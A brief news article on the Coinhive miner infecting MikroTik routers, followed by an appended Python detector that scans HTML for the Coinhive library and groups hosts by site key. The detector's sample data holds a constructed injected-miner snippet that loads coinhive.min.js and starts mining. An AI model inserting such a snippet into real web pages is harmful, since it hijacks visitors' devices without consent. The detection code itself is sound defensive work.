The Coinhive Miner virus has infected hundreds of thousands of MikroTik routers. The malware has now reportedly installed a JavaScript miner on over 170,000 devices, and the outbreak is believed to be still growing.
The first hint of the attacks came from a researcher who goes by the nickname MalwareHunterBR and who tweeted that the miner had started to spread at an alarming rate. In addition, it has been reported that the first stages of the attack alone compromised about 70 thousand routers.
What is Behind Coinhive’s Infection Success
It is believed that the hacker may have used one of the exploits for MikroTik devices to perform a zero-day type of attack on a device and then dropped a copy of the Coinhive library on it. This library is also injected into all of the pages displayed by the router, making all of the devices connected to it vulnerable.
Furthermore, since the zero-day has been exploited using only one Coinhive key for all of the Coinhive injections performed over the past week, it is believed that only one attacker is behind the attack.
In addition, researchers claim that non-MikroTik users were also among the victims: some Internet service providers use MikroTik devices in their main network, and since the hacker has injected the JavaScript code, the attack has spread to all of the devices that are logically connected to the compromised MikroTik routers.
The injection has been tremendously successful because of how the attack is carried out and because the infection process succeeded in obtaining control over incoming and outgoing traffic.
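An added example, not part of the original article: a defender-side check that scans captured HTML responses for the Coinhive library include, extracts the site key, and groups hosts by key, which is the observation behind the single-attacker conclusion above. The sample pages, host addresses and site key are constructed; the `coinhive.min.js` script name and the `CoinHive.Anonymous` constructor come from Coinhive's public API.

```python
import re
from collections import defaultdict

# Script include for Coinhive's hosted library, and its miner constructors.
LIB_RE = re.compile(r'<script[^>]+src=["\'][^"\']*coinhive(?:\.min)?\.js', re.I)
KEY_RE = re.compile(r'CoinHive\.(?:Anonymous|User|Token)\(\s*["\']([A-Za-z0-9]+)["\']')

# Constructed sample data: documentation-range addresses and a placeholder key.
FAKE_KEY = "CONSTRUCTEDSITEKEY0000000000000A"
INJECTED = ('<html><head><script src="https://coinhive.com/lib/coinhive.min.js">'
            '</script><script>var m = new CoinHive.Anonymous(\'%s\', {throttle: 0.2});'
            'm.start();</script></head><body>Error page</body></html>' % FAKE_KEY)
SAMPLE_PAGES = {
    "192.0.2.10": INJECTED,
    "192.0.2.77": INJECTED.replace("Error page", "Proxy error"),
    "198.51.100.5": "<html><body><script src='/js/app.js'></script></body></html>",
}

def scan_page(html):
    """Return (library_included, site_keys) for one HTML response body."""
    return bool(LIB_RE.search(html)), KEY_RE.findall(html)

def group_by_key(pages):
    """Map each site key to the sorted list of hosts that served it."""
    hosts_by_key = defaultdict(set)
    for host, html in pages.items():
        included, keys = scan_page(html)
        if not included and not keys:
            continue  # clean page
        # A library include without a readable key is still worth reporting.
        for key in keys or ["<key not found>"]:
            hosts_by_key[key].add(host)
    return {key: sorted(hosts) for key, hosts in hosts_by_key.items()}

if __name__ == "__main__":
    for key, hosts in group_by_key(SAMPLE_PAGES).items():
        print(f"{key}: {len(hosts)} host(s) -> {', '.join(hosts)}")
```

Run over pages fetched through different network paths, a single key covering many hosts points to one campaign, while a page that differs only by the injected script tags points to an in-path device rewriting traffic.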